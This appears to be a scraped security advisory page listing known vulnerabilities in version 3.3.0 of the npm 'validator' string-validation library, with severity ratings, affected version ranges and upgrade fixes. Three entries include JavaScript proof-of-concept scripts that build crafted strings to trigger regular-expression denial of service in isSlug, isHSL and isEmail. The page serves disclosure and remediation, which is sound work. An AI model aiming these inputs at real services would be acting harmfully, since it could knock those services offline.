validator 3.3.0 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the validator package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free

Vulnerability	Vulnerable Version
M Improper Validation of Specified Type of Input validator is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input. The isURL() function in the validator module parses and validates protocols in URLs using the following method How to fix Improper Validation of Specified Type of Input? A fix was pushed into the `master` branch but not yet published.	*
M Regular Expression Denial of Service (ReDoS) validator is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isSlug` function PoC `var validator = require("validator") function build_attack(n) { var ret = "111" for (var i = 0; i < n; i++) { ret += "a" } return ret+"_"; } for(var i = 1; i <= 50000; i++) { if (i % 10000 == 0) { var time = Date.now(); var attack_str = build_attack(i) validator.isSlug(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `validator` to version 13.6.0 or higher.	<13.6.0
M Regular Expression Denial of Service (ReDoS) validator is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isHSL` function. PoC `var validator = require("validator") function build_attack(n) { var ret = "hsla(0" for (var i = 0; i < n; i++) { ret += " " } return ret+"◎"; } for(var i = 1; i <= 50000; i++) { if (i % 1000 == 0) { var time = Date.now(); var attack_str = build_attack(i) validator.isHSL(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `validator` to version 13.6.0 or higher.	<13.6.0
M Regular Expression Denial of Service (ReDoS) validator is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isEmail` function. PoC `var validator = require("validator") function build_attack(n) { var ret = "" for (var i = 0; i < n; i++) { ret += "<" } return ret+""; } for(var i = 1; i <= 50000; i++) { if (i % 10000 == 0) { var time = Date.now(); var attack_str = build_attack(i) validator.isEmail(attack_str,{ allow_display_name: true }) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `validator` to version 13.6.0 or higher.	<13.6.0
M Buffer Overflow `validator` is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Buffer Overflow. It used a regular expression (`/^(?:[A-Z0-9+\/]{4})*(?:[A-Z0-9+\/]{2}==\|[A-Z0-9+\/]{3}=\|[A-Z0-9+\/]{4})$/i`) in order to validate Base64 strings. How to fix Buffer Overflow? Upgrade `validator` to version 5.0.0 or higher.	<5.0.0
M Cross-site Scripting (XSS) `validator` is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in IE9 due to unescaped backticks. How to fix Cross-site Scripting (XSS)? Upgrade `validator` to version 3.35.0 or higher.	>=3.0.0 <3.34.0
H Regular Expression Denial of Service (ReDoS) `validator` is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. It used a regular expression in order to validate URLs. How to fix Regular Expression Denial of Service (ReDoS)? Update to version 3.22.1 or greater.	>=0.1.0 <3.22.1

Vulnerability

Vulnerable Version

Improper Validation of Specified Type of Input

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input. The isURL() function in the validator module parses and validates protocols in URLs using the following method

How to fix Improper Validation of Specified Type of Input?

A fix was pushed into the master branch but not yet published.

Regular Expression Denial of Service (ReDoS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isSlug function

PoC

var validator = require("validator")
function build_attack(n) {
    var ret = "111"
    for (var i = 0; i < n; i++) {
        ret += "a"
    }

    return ret+"_";
}
for(var i = 1; i <= 50000; i++) {
    if (i % 10000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
       validator.isSlug(attack_str)
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
   }
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade validator to version 13.6.0 or higher.

<13.6.0

Regular Expression Denial of Service (ReDoS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isHSL function.

PoC

var validator = require("validator")
function build_attack(n) {
    var ret = "hsla(0"
    for (var i = 0; i < n; i++) {
        ret += " "
    }

    return ret+"◎";
}
for(var i = 1; i <= 50000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
       validator.isHSL(attack_str)
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
   }
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade validator to version 13.6.0 or higher.

<13.6.0

Regular Expression Denial of Service (ReDoS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isEmail function.

PoC

var validator = require("validator")
function build_attack(n) {
    var ret = ""
    for (var i = 0; i < n; i++) {
        ret += "<"
    }

    return ret+"";
}
for(var i = 1; i <= 50000; i++) {
    if (i % 10000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        validator.isEmail(attack_str,{ allow_display_name: true })
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
   }
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade validator to version 13.6.0 or higher.

<13.6.0

Buffer Overflow

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Buffer Overflow. It used a regular expression (/^(?:[A-Z0-9+\/]{4})*(?:[A-Z0-9+\/]{2}==|[A-Z0-9+\/]{3}=|[A-Z0-9+\/]{4})$/i) in order to validate Base64 strings.

How to fix Buffer Overflow?

Upgrade validator to version 5.0.0 or higher.

<5.0.0

Cross-site Scripting (XSS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in IE9 due to unescaped backticks.

How to fix Cross-site Scripting (XSS)?

Upgrade validator to version 3.35.0 or higher.

>=3.0.0 <3.34.0

Regular Expression Denial of Service (ReDoS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. It used a regular expression in order to validate URLs.

How to fix Regular Expression Denial of Service (ReDoS)?

Update to version 3.22.1 or greater.

>=0.1.0 <3.22.1

validator@3.3.0 vulnerabilities

String validation and sanitization

latest version

first published

latest version published

licenses detected

Direct Vulnerabilities

Fix vulnerabilities automatically

PoC

PoC

PoC